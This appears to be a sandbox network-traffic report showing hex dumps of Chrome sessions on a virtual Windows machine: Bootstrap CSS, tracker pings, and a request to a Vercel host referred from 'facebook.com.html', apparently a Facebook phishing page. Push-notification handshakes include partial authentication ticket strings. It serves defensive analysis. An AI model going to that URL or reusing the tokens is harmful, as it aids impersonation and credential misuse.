                          2025-01-14 23:42:34 UTC16384INData Raw: 3a 31 30 7d 2e 6f 72 64 65 72 2d 73 6d 2d 31 31 7b 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 31 31 3b 6f 72 64 65 72 3a 31 31 7d 2e 6f 72 64 65 72 2d 73 6d 2d 31 32 7b 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 31 32 3b 6f 72 64 65 72 3a 31 32 7d 2e 6f 66 66 73 65 74 2d 73 6d 2d 30 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 7d 2e 6f 66 66 73 65 74 2d 73 6d 2d 31 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 38 2e 33 33 33 33 33 33 25 7d 2e 6f 66 66 73 65 74 2d 73 6d 2d 32 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 31 36 2e 36 36 36 36 36 37 25 7d 2e 6f 66 66 73 65 74 2d 73 6d 2d 33 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 32 35 25 7d 2e 6f 66 66 73 65 74 2d 73 6d 2d 34 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 33 2e 33 33 33 33 33 33 25 7d 2e 6f 66 66 73 65 74 2d
                          Data Ascii: :10}.order-sm-11{-ms-flex-order:11;order:11}.order-sm-12{-ms-flex-order:12;order:12}.offset-sm-0{margin-left:0}.offset-sm-1{margin-left:8.333333%}.offset-sm-2{margin-left:16.666667%}.offset-sm-3{margin-left:25%}.offset-sm-4{margin-left:33.333333%}.offset-
                          2025-01-14 23:42:34 UTC16384INData Raw: 34 36 2d 31 2e 34 20 31 2e 31 2d 2e 38 6c 31 2e 31 20 31 2e 34 20 33 2e 34 2d 33 2e 38 63 2e 36 2d 2e 36 33 20 31 2e 36 2d 2e 32 37 20 31 2e 32 2e 37 6c 2d 34 20 34 2e 36 63 2d 2e 34 33 2e 35 2d 2e 38 2e 34 2d 31 2e 31 2e 31 7a 27 2f 25 33 65 25 33 63 2f 73 76 67 25 33 65 22 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 72 69 67 68 74 20 63 61 6c 63 28 2e 33 37 35 65 6d 20 2b 20 2e 31 38 37 35 72 65 6d 29 20 63 65 6e 74 65 72 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 63 61 6c 63 28 2e 37 35 65 6d 20 2b 20 2e 33 37 35 72 65 6d 29 20 63 61 6c 63 28 2e 37 35 65 6d 20 2b 20 2e 33 37 35 72 65 6d 29 7d 2e 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 2e 69 73
                          Data Ascii: 46-1.4 1.1-.8l1.1 1.4 3.4-3.8c.6-.63 1.6-.27 1.2.7l-4 4.6c-.43.5-.8.4-1.1.1z'/%3e%3c/svg%3e");background-repeat:no-repeat;background-position:right calc(.375em + .1875rem) center;background-size:calc(.75em + .375rem) calc(.75em + .375rem)}.form-control.is
                          2025-01-14 23:42:34 UTC16384INData Raw: 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 32 38 61 37 34 35 7d 2e 62 74 6e 2d 6f 75 74 6c 69 6e 65 2d 73 75 63 63 65 73 73 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 38 61 37 34 35 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 32 38 61 37 34 35 7d 2e 62 74 6e 2d 6f 75 74 6c 69 6e 65 2d 73 75 63 63 65 73 73 2e 66 6f 63 75 73 2c 2e 62 74 6e 2d 6f 75 74 6c 69 6e 65 2d 73 75 63 63 65 73 73 3a 66 6f 63 75 73 7b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 30 20 30 20 2e 32 72 65 6d 20 72 67 62 61 28 34 30 2c 31 36 37 2c 36 39 2c 2e 35 29 7d 2e 62 74 6e 2d 6f 75 74 6c 69 6e 65 2d 73 75 63 63 65 73 73 2e 64 69 73 61 62 6c 65 64 2c 2e 62 74 6e 2d 6f 75 74 6c 69 6e 65 2d 73 75 63 63 65 73 73 3a 64 69 73 61 62
                          Data Ascii: rder-color:#28a745}.btn-outline-success:hover{color:#fff;background-color:#28a745;border-color:#28a745}.btn-outline-success.focus,.btn-outline-success:focus{box-shadow:0 0 0 .2rem rgba(40,167,69,.5)}.btn-outline-success.disabled,.btn-outline-success:disab
                          2025-01-14 23:42:34 UTC16384INData Raw: 75 73 7e 2e 63 75 73 74 6f 6d 2d 63 6f 6e 74 72 6f 6c 2d 6c 61 62 65 6c 3a 3a 62 65 66 6f 72 65 7b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 30 20 30 20 2e 32 72 65 6d 20 72 67 62 61 28 30 2c 31 32 33 2c 32 35 35 2c 2e 32 35 29 7d 2e 63 75 73 74 6f 6d 2d 63 6f 6e 74 72 6f 6c 2d 69 6e 70 75 74 3a 66 6f 63 75 73 3a 6e 6f 74 28 3a 63 68 65 63 6b 65 64 29 7e 2e 63 75 73 74 6f 6d 2d 63 6f 6e 74 72 6f 6c 2d 6c 61 62 65 6c 3a 3a 62 65 66 6f 72 65 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 38 30 62 64 66 66 7d 2e 63 75 73 74 6f 6d 2d 63 6f 6e 74 72 6f 6c 2d 69 6e 70 75 74 3a 6e 6f 74 28 3a 64 69 73 61 62 6c 65 64 29 3a 61 63 74 69 76 65 7e 2e 63 75 73 74 6f 6d 2d 63 6f 6e 74 72 6f 6c 2d 6c 61 62 65 6c 3a 3a 62 65 66 6f 72 65 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 62
                          Data Ascii: us~.custom-control-label::before{box-shadow:0 0 0 .2rem rgba(0,123,255,.25)}.custom-control-input:focus:not(:checked)~.custom-control-label::before{border-color:#80bdff}.custom-control-input:not(:disabled):active~.custom-control-label::before{color:#fff;b
                          2025-01-14 23:42:34 UTC16384INData Raw: 67 2c 2e 6e 61 76 62 61 72 2d 65 78 70 61 6e 64 3e 2e 63 6f 6e 74 61 69 6e 65 72 2d 6d 64 2c 2e 6e 61 76 62 61 72 2d 65 78 70 61 6e 64 3e 2e 63 6f 6e 74 61 69 6e 65 72 2d 73 6d 2c 2e 6e 61 76 62 61 72 2d 65 78 70 61 6e 64 3e 2e 63 6f 6e 74 61 69 6e 65 72 2d 78 6c 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 7d 2e 6e 61 76 62 61 72 2d 65 78 70 61 6e 64 20 2e 6e 61 76 62 61 72 2d 6e 61 76 7b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 7d 2e 6e 61 76 62 61 72 2d 65 78 70 61 6e 64 20 2e 6e 61 76 62 61 72 2d 6e 61 76 20 2e 64 72 6f 70 64 6f 77 6e 2d 6d 65 6e 75 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 7d 2e 6e 61 76 62 61
                          Data Ascii: g,.navbar-expand>.container-md,.navbar-expand>.container-sm,.navbar-expand>.container-xl{padding-right:0;padding-left:0}.navbar-expand .navbar-nav{-ms-flex-direction:row;flex-direction:row}.navbar-expand .navbar-nav .dropdown-menu{position:absolute}.navba
                          2025-01-14 23:42:34 UTC16384INData Raw: 66 74 2d 72 61 64 69 75 73 3a 30 7d 2e 6c 69 73 74 2d 67 72 6f 75 70 2d 68 6f 72 69 7a 6f 6e 74 61 6c 2d 6d 64 20 2e 6c 69 73 74 2d 67 72 6f 75 70 2d 69 74 65 6d 2e 61 63 74 69 76 65 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 7d 2e 6c 69 73 74 2d 67 72 6f 75 70 2d 68 6f 72 69 7a 6f 6e 74 61 6c 2d 6d 64 20 2e 6c 69 73 74 2d 67 72 6f 75 70 2d 69 74 65 6d 2b 2e 6c 69 73 74 2d 67 72 6f 75 70 2d 69 74 65 6d 7b 62 6f 72 64 65 72 2d 74 6f 70 2d 77 69 64 74 68 3a 31 70 78 3b 62 6f 72 64 65 72 2d 6c 65 66 74 2d 77 69 64 74 68 3a 30 7d 2e 6c 69 73 74 2d 67 72 6f 75 70 2d 68 6f 72 69 7a 6f 6e 74 61 6c 2d 6d 64 20 2e 6c 69 73 74 2d 67 72 6f 75 70 2d 69 74 65 6d 2b 2e 6c 69 73 74 2d 67 72 6f 75 70 2d 69 74 65 6d 2e 61 63 74 69 76 65 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a
                          Data Ascii: ft-radius:0}.list-group-horizontal-md .list-group-item.active{margin-top:0}.list-group-horizontal-md .list-group-item+.list-group-item{border-top-width:1px;border-left-width:0}.list-group-horizontal-md .list-group-item+.list-group-item.active{margin-left:
                          2025-01-14 23:42:34 UTC16384INData Raw: 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 2c 25 33 63 73 76 67 20 78 6d 6c 6e 73 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 27 20 66 69 6c 6c 3d 27 25 32 33 66 66 66 27 20 77 69 64 74 68 3d 27 38 27 20 68 65 69 67 68 74 3d 27 38 27 20 76 69 65 77 42 6f 78 3d 27 30 20 30 20 38 20 38 27 25 33 65 25 33 63 70 61 74 68 20 64 3d 27 4d 35 2e 32 35 20 30 6c 2d 34 20 34 20 34 20 34 20 31 2e 35 2d 31 2e 35 4c 34 2e 32 35 20 34 6c 32 2e 35 2d 32 2e 35 4c 35 2e 32 35 20 30 7a 27 2f 25 33 65 25 33 63 2f 73 76 67 25 33 65 22 29 7d 2e 63 61 72 6f 75 73 65 6c 2d 63 6f 6e 74 72 6f 6c 2d 6e 65 78 74 2d 69 63 6f 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 22 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 2c
                          Data Ascii: mage/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' fill='%23fff' width='8' height='8' viewBox='0 0 8 8'%3e%3cpath d='M5.25 0l-4 4 4 4 1.5-1.5L4.25 4l2.5-2.5L5.25 0z'/%3e%3c/svg%3e")}.carousel-control-next-icon{background-image:url("data:image/svg+xml,
                          2025-01-14 23:42:34 UTC16384INData Raw: 72 65 74 63 68 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 61 6c 69 67 6e 2d 63 6f 6e 74 65 6e 74 2d 6d 64 2d 73 74 61 72 74 7b 2d 6d 73 2d 66 6c 65 78 2d 6c 69 6e 65 2d 70 61 63 6b 3a 73 74 61 72 74 21 69 6d 70 6f 72 74 61 6e 74 3b 61 6c 69 67 6e 2d 63 6f 6e 74 65 6e 74 3a 66 6c 65 78 2d 73 74 61 72 74 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 61 6c 69 67 6e 2d 63 6f 6e 74 65 6e 74 2d 6d 64 2d 65 6e 64 7b 2d 6d 73 2d 66 6c 65 78 2d 6c 69 6e 65 2d 70 61 63 6b 3a 65 6e 64 21 69 6d 70 6f 72 74 61 6e 74 3b 61 6c 69 67 6e 2d 63 6f 6e 74 65 6e 74 3a 66 6c 65 78 2d 65 6e 64 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 61 6c 69 67 6e 2d 63 6f 6e 74 65 6e 74 2d 6d 64 2d 63 65 6e 74 65 72 7b 2d 6d 73 2d 66 6c 65 78 2d 6c 69 6e 65 2d 70 61 63 6b 3a 63 65 6e 74 65 72 21 69 6d 70 6f 72 74
                          Data Ascii: retch!important}.align-content-md-start{-ms-flex-line-pack:start!important;align-content:flex-start!important}.align-content-md-end{-ms-flex-line-pack:end!important;align-content:flex-end!important}.align-content-md-center{-ms-flex-line-pack:center!import


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          11192.168.2.649755104.22.74.1714435068C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2025-01-14 23:42:34 UTC393OUTGET /pingjs/?k=pe3434gg?&t=~GOOGLE~&x=https://www.google.com/ HTTP/1.1
                          Host: whos.amung.us
                          Connection: keep-alive
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          Accept: */*
                          Sec-Fetch-Site: none
                          Sec-Fetch-Mode: cors
                          Sec-Fetch-Dest: empty
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2025-01-14 23:42:34 UTC254INHTTP/1.1 200 OK
                          Date: Tue, 14 Jan 2025 23:42:34 GMT
                          Content-Type: text/javascript;charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: close
                          CF-Cache-Status: DYNAMIC
                          Server: cloudflare
                          CF-RAY: 90217bb7783615c3-EWR
                          alt-svc: h3=":443"; ma=86400
                          2025-01-14 23:42:34 UTC32INData Raw: 31 61 0d 0a 57 41 55 5f 72 5f 28 27 36 27 2c 27 70 65 33 34 33 34 67 67 27 2c 2d 31 29 3b 0d 0a
                          Data Ascii: 1aWAU_r_('6','pe3434gg',-1);
                          2025-01-14 23:42:34 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          12192.168.2.649754104.22.74.1714435068C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2025-01-14 23:42:34 UTC396OUTGET /pingjs/?k=3445435454v?&t=~GOOGLE~&x=https://www.google.com/ HTTP/1.1
                          Host: whos.amung.us
                          Connection: keep-alive
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          Accept: */*
                          Sec-Fetch-Site: none
                          Sec-Fetch-Mode: cors
                          Sec-Fetch-Dest: empty
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2025-01-14 23:42:34 UTC254INHTTP/1.1 200 OK
                          Date: Tue, 14 Jan 2025 23:42:34 GMT
                          Content-Type: text/javascript;charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: close
                          CF-Cache-Status: DYNAMIC
                          Server: cloudflare
                          CF-RAY: 90217bb7888f0f42-EWR
                          alt-svc: h3=":443"; ma=86400
                          2025-01-14 23:42:34 UTC35INData Raw: 31 64 0d 0a 57 41 55 5f 72 5f 28 27 36 27 2c 27 33 34 34 35 34 33 35 34 35 34 76 27 2c 2d 31 29 3b 0d 0a
                          Data Ascii: 1dWAU_r_('6','3445435454v',-1);
                          2025-01-14 23:42:34 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          13192.168.2.649756216.198.79.14435068C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2025-01-14 23:42:34 UTC655OUTGET /favicon.ico HTTP/1.1
                          Host: mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app
                          Connection: keep-alive
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          sec-ch-ua-mobile: ?0
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          sec-ch-ua-platform: "Windows"
                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                          Sec-Fetch-Site: same-origin
                          Sec-Fetch-Mode: no-cors
                          Sec-Fetch-Dest: image
                          Referer: https://mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app/facebook.com.html
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2025-01-14 23:42:34 UTC363INHTTP/1.1 404 Not Found
                          Cache-Control: public, max-age=0, must-revalidate
                          Content-Length: 39
                          Content-Type: text/plain; charset=utf-8
                          Date: Tue, 14 Jan 2025 23:42:34 GMT
                          Server: Vercel
                          Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                          X-Vercel-Error: NOT_FOUND
                          X-Vercel-Id: iad1::lbg9g-1736898154218-6c6d5dbe6fe3
                          Connection: close
                          2025-01-14 23:42:34 UTC39INData Raw: 54 68 65 20 70 61 67 65 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 0a 0a 4e 4f 54 5f 46 4f 55 4e 44 0a
                          Data Ascii: The page could not be foundNOT_FOUND


                          Session IDSource IPSource PortDestination IPDestination Port
                          14192.168.2.64976240.115.3.253443
                          TimestampBytes transferredDirectionData
                          2025-01-14 23:42:35 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 4d 2f 4e 66 52 2f 33 65 56 55 75 79 38 39 41 43 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 36 34 38 62 32 38 31 61 36 36 38 36 61 62 35 0d 0a 0d 0a
                          Data Ascii: CNT 1 CON 305MS-CV: M/NfR/3eVUuy89AC.1Context: a648b281a6686ab5
                          2025-01-14 23:42:35 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                          Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                          2025-01-14 23:42:35 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 4d 2f 4e 66 52 2f 33 65 56 55 75 79 38 39 41 43 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 36 34 38 62 32 38 31 61 36 36 38 36 61 62 35 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 57 4f 70 37 59 56 35 33 6a 38 51 34 58 4b 45 37 69 76 69 58 79 69 62 51 7a 51 42 4d 73 4d 4b 50 76 51 34 35 50 30 37 30 77 72 57 47 73 51 6e 43 52 38 31 78 6e 4b 74 69 75 44 53 68 66 55 32 36 30 5a 31 64 76 62 57 57 74 77 4a 30 58 6c 62 59 51 51 4c 79 72 39 6d 41 34 41 34 44 51 78 51 42 2b 74 64 76 67 53 6a 68 4f 73 4d 74 70
                          Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: M/NfR/3eVUuy89AC.2Context: a648b281a6686ab5<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAWOp7YV53j8Q4XKE7iviXyibQzQBMsMKPvQ45P070wrWGsQnCR81xnKtiuDShfU260Z1dvbWWtwJ0XlbYQQLyr9mA4A4DQxQB+tdvgSjhOsMtp
                          2025-01-14 23:42:35 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 4d 2f 4e 66 52 2f 33 65 56 55 75 79 38 39 41 43 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 36 34 38 62 32 38 31 61 36 36 38 36 61 62 35 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                          Data Ascii: BND 3 CON\WNS 0 197MS-CV: M/NfR/3eVUuy89AC.3Context: a648b281a6686ab5<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                          2025-01-14 23:42:35 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                          Data Ascii: 202 1 CON 58
                          2025-01-14 23:42:35 UTC58INData Raw: 4d 53 2d 43 56 3a 20 6c 48 2b 77 33 50 69 4c 69 30 57 50 6a 31 6f 4a 74 33 50 4b 50 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                          Data Ascii: MS-CV: lH+w3PiLi0WPj1oJt3PKPA.0Payload parsing failed.


                          Session IDSource IPSource PortDestination IPDestination Port
                          15192.168.2.64984540.115.3.253443
                          TimestampBytes transferredDirectionData
                          2025-01-14 23:42:47 UTC70OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 34 0d 0a 4d 53 2d 43 56 3a 20 58 52 4e 46 4f 50 39 2f 42 55 57 31 55 38 68 6c 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 31 61 66 32 36 61 64 64 34 61 35 39 32 36 0d 0a 0d 0a
                          Data Ascii: CNT 1 CON 304MS-CV: XRNFOP9/BUW1U8hl.1Context: a1af26add4a5926
                          2025-01-14 23:42:47 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                          Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                          2025-01-14 23:42:47 UTC1083OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 30 0d 0a 4d 53 2d 43 56 3a 20 58 52 4e 46 4f 50 39 2f 42 55 57 31 55 38 68 6c 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 31 61 66 32 36 61 64 64 34 61 35 39 32 36 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 57 4f 70 37 59 56 35 33 6a 38 51 34 58 4b 45 37 69 76 69 58 79 69 62 51 7a 51 42 4d 73 4d 4b 50 76 51 34 35 50 30 37 30 77 72 57 47 73 51 6e 43 52 38 31 78 6e 4b 74 69 75 44 53 68 66 55 32 36 30 5a 31 64 76 62 57 57 74 77 4a 30 58 6c 62 59 51 51 4c 79 72 39 6d 41 34 41 34 44 51 78 51 42 2b 74 64 76 67 53 6a 68 4f 73 4d 74 70 64
                          Data Ascii: ATH 2 CON\DEVICE 1060MS-CV: XRNFOP9/BUW1U8hl.2Context: a1af26add4a5926<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAWOp7YV53j8Q4XKE7iviXyibQzQBMsMKPvQ45P070wrWGsQnCR81xnKtiuDShfU260Z1dvbWWtwJ0XlbYQQLyr9mA4A4DQxQB+tdvgSjhOsMtpd
                          2025-01-14 23:42:47 UTC217OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 36 0d 0a 4d 53 2d 43 56 3a 20 58 52 4e 46 4f 50 39 2f 42 55 57 31 55 38 68 6c 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 31 61 66 32 36 61 64 64 34 61 35 39 32 36 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                          Data Ascii: BND 3 CON\WNS 0 196MS-CV: XRNFOP9/BUW1U8hl.3Context: a1af26add4a5926<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                          2025-01-14 23:42:47 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                          Data Ascii: 202 1 CON 58
                          2025-01-14 23:42:47 UTC58INData Raw: 4d 53 2d 43 56 3a 20 4e 39 67 75 73 4c 54 41 63 55 47 39 50 48 74 76 4d 38 6b 33 4a 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                          Data Ascii: MS-CV: N9gusLTAcUG9PHtvM8k3JQ.0Payload parsing failed.


                          Session IDSource IPSource PortDestination IPDestination Port
                          16192.168.2.64995740.115.3.253443
                          TimestampBytes transferredDirectionData
                          2025-01-14 23:43:05 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 61 34 4c 6a 30 52 31 32 54 45 43 41 57 4e 62 56 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 34 37 31 63 61 33 36 34 62 30 30 37 38 32 33 0d 0a 0d 0a
                          Data Ascii: CNT 1 CON 305MS-CV: a4Lj0R12TECAWNbV.1Context: b471ca364b007823
